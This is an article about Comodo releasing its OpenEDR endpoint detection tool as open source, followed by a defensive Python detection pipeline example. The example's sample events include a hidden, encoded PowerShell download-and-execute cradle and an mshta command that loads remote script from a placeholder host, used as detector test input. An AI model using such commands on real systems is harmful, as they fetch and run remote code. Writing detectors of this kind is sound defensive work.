Endpoint detection and response (EDR) is a security technology that continually monitors hosts for suspicious activity and responds to it.
Sometimes compared to Advanced Threat Protection (ATP) in terms of overall security capability, EDR works on the endpoints themselves, detecting and responding to threats, and to traces of threats, in endpoint events. It records that information in a central database, where further analysis, detection, investigation, reporting and alerting take place.
EDR is usually delivered as part of a vendor's security suite by installing an agent on the host system.
Comodo Security, the creator of Comodo Internet Security (CIS), the freemium internet security suite that includes an antivirus program, a personal firewall, a sandbox, a host-based intrusion prevention system (HIPS) and website filtering, has become the first major cybersecurity company to open-source its own EDR tool.
Calling it OpenEDR, the company has made the tool available for free on GitHub.
This follows the plans it announced back in September to move the product to open source.
EDR vendors deploy their tools to gather data from endpoint devices and then analyze that data to find potential threats and issues.
EDR is commonly used to protect against intrusion attempts and theft of user data.
After installation, the agent runs on the end-user device and continuously monitors the system.
The approach is that every finding is stored in a centralized database, so that when an incident is identified, the end user is immediately prompted with a list of preventive actions to take.
Every EDR platform has its own set of capabilities.
However, some common capabilities include monitoring endpoints both online and offline, responding to threats in real time, increasing visibility into and transparency of user data, storing endpoint events and detecting malware injection, creating blacklists and whitelists, and integrating with other technologies.
EDR is considered the next step in the evolution of antivirus software: where traditional antivirus is designed to block known malware at the moment it executes, EDR takes a more proactive approach, recording endpoint activity so that threats can be detected, investigated and responded to even when they were not blocked up front.
The reason Comodo open-sourced its tool, it says, is that it concluded competitors' endpoint products fall short of protecting customers and then charge extra for EDR capability.
"We are offering our EDR as open source because we feel strongly that as cyber-threats increase, every company should have access to this capability regardless of budget or ability to purchase it," Alan Knepfer, President and Chief Revenue Officer at Comodo, said back in September.
"Our competitors offer endpoint protection that falls short of protecting customers, and then charge additional for EDR capability. This kind of pricing strategy from cybersecurity vendors will weaken the cybersecurity resources available to enterprises," Knepfer added.
"The model of charging for multiple layers because they fail in protecting customers is not a healthy business model for the long term. We are putting an end to that by open sourcing the world’s most sophisticated EDR," Comodo said in a post.
Comodo's open-sourced OpenEDR has all of the basic functionality expected of an EDR.
For example, it includes the ability to roll out custom detection rules and IOCs, real-time monitoring of workstation filesystems, detection of fileless threats, a recommendation engine that advises on the measures that need to be taken, a GUI, and a threat-vector investigation capability.
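To make the capability list above concrete, here is a small EDR-style analysis pipeline. It is an added example written for this article, not OpenEDR's code, and it assumes a simple event shape (type, host, image, cmdline, path, sha256) that an agent might report. It matches constructed endpoint events against IOC hashes, a blocklist, a path-plus-hash allowlist, a rule for executables dropped into user-writable directories, and a rule that decodes encoded PowerShell as a stand-in for fileless-threat detection; matched events become alerts (the "central database") and the alerts drive a recommended-actions list. All hashes, paths, hosts and the encoded command are made up for the example.

```python
"""Minimal EDR-style detection pipeline (added example, not OpenEDR's code).
Every event, hash and indicator below is constructed for illustration."""
import base64
import re
from dataclasses import dataclass


@dataclass
class Alert:
    host: str
    rule: str
    severity: str
    details: str
    recommendation: str
    event: dict


# Indicators an analyst would push to the agents (constructed placeholders).
IOC_HASHES = {"7f3a" * 16: "constructed dropper sample"}
BLOCKLIST_IMAGES = {r"c:\windows\system32\mshta.exe"}
# Allowlist by (path, hash): a path-only allowlist is bypassed by a renamed binary.
ALLOWLIST = {(r"c:\windows\system32\svchost.exe", "1c2d" * 16)}
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
# -e, -ec, -enc or -EncodedCommand followed by a base64 blob.
_ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def is_allowlisted(ev: dict) -> bool:
    return (ev.get("image", "").lower(), ev.get("sha256")) in ALLOWLIST


def ioc_hash(ev: dict):
    name = IOC_HASHES.get(ev.get("sha256", ""))
    return f"hash matches IOC '{name}'" if name else None


def blocklisted_image(ev: dict):
    img = ev.get("image", "").lower()
    return f"blocklisted image {img}" if img in BLOCKLIST_IMAGES else None


def dropped_executable(ev: dict):
    if ev.get("type") != "file_write":
        return None
    path = ev.get("path", "").lower()
    if path.startswith(USER_WRITABLE) and path.endswith((".exe", ".dll", ".scr")):
        return f"executable written to user-writable path {path}"
    return None


def fileless_powershell(ev: dict):
    """Encoded PowerShell with no script on disk; decode it for the analyst."""
    if ev.get("type") != "process" or "powershell" not in ev.get("image", "").lower():
        return None
    m = _ENC_RE.search(ev.get("cmdline", ""))
    if not m:
        return None
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:
        decoded = "<undecodable>"
    return f"encoded PowerShell command: {decoded.strip()}"


# Each rule: name, severity, matcher returning details or None, recommended action.
RULES = [
    ("ioc-hash", "critical", ioc_hash, "Isolate the host and quarantine the file"),
    ("blocklisted-image", "high", blocklisted_image, "Kill the process and review its parent"),
    ("dropped-executable", "medium", dropped_executable, "Quarantine the file and check for persistence"),
    ("fileless-powershell", "high", fileless_powershell, "Kill the process and review the decoded command"),
]


def analyze(events):
    """Central analysis: allowlisted events are skipped, the rest hit every rule."""
    alerts = []
    for ev in events:
        if is_allowlisted(ev):
            continue
        for name, severity, match, action in RULES:
            details = match(ev)
            if details:
                alerts.append(Alert(ev.get("host", "?"), name, severity, details, action, ev))
    return alerts


def recommended_actions(alerts):
    """Ordered, de-duplicated action list to prompt the user or analyst with."""
    rank = {"critical": 0, "high": 1, "medium": 2, "low": 3}
    seen, out = set(), []
    for a in sorted(alerts, key=lambda a: rank[a.severity]):
        if a.recommendation not in seen:
            seen.add(a.recommendation)
            out.append(a.recommendation)
    return out


# Constructed agent events; example.invalid is a reserved, non-resolving domain.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
_ENCODED = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"type": "process", "host": "ws01", "image": r"C:\Windows\System32\svchost.exe",
     "sha256": "1c2d" * 16, "cmdline": "svchost.exe -k netsvcs"},
    {"type": "process", "host": "ws01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "sha256": "aa11" * 16, "cmdline": f"powershell.exe -nop -w hidden -EncodedCommand {_ENCODED}"},
    {"type": "file_write", "host": "ws01", "path": r"C:\Users\bob\AppData\Roaming\update.exe",
     "sha256": "7f3a" * 16},
    {"type": "process", "host": "ws02", "image": r"C:\Windows\System32\mshta.exe",
     "sha256": "bb22" * 16, "cmdline": "mshta.exe http://example.invalid/x.hta"},
    {"type": "process", "host": "ws02", "image": r"C:\Windows\System32\notepad.exe",
     "sha256": "cc33" * 16, "cmdline": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    found = analyze(SAMPLE_EVENTS)
    for a in found:
        print(f"[{a.severity}] {a.host} {a.rule}: {a.details}")
    print("Recommended actions:", recommended_actions(found))
```

Two design points worth noting. The allowlist is keyed on path and hash together, because an attacker who drops a payload as `svchost.exe` in the expected directory defeats a path-only allowlist. And the "fileless" rule does not just flag `-EncodedCommand`; it decodes the blob so the alert carries the actual command, which is what an analyst needs for the investigation step the article mentions.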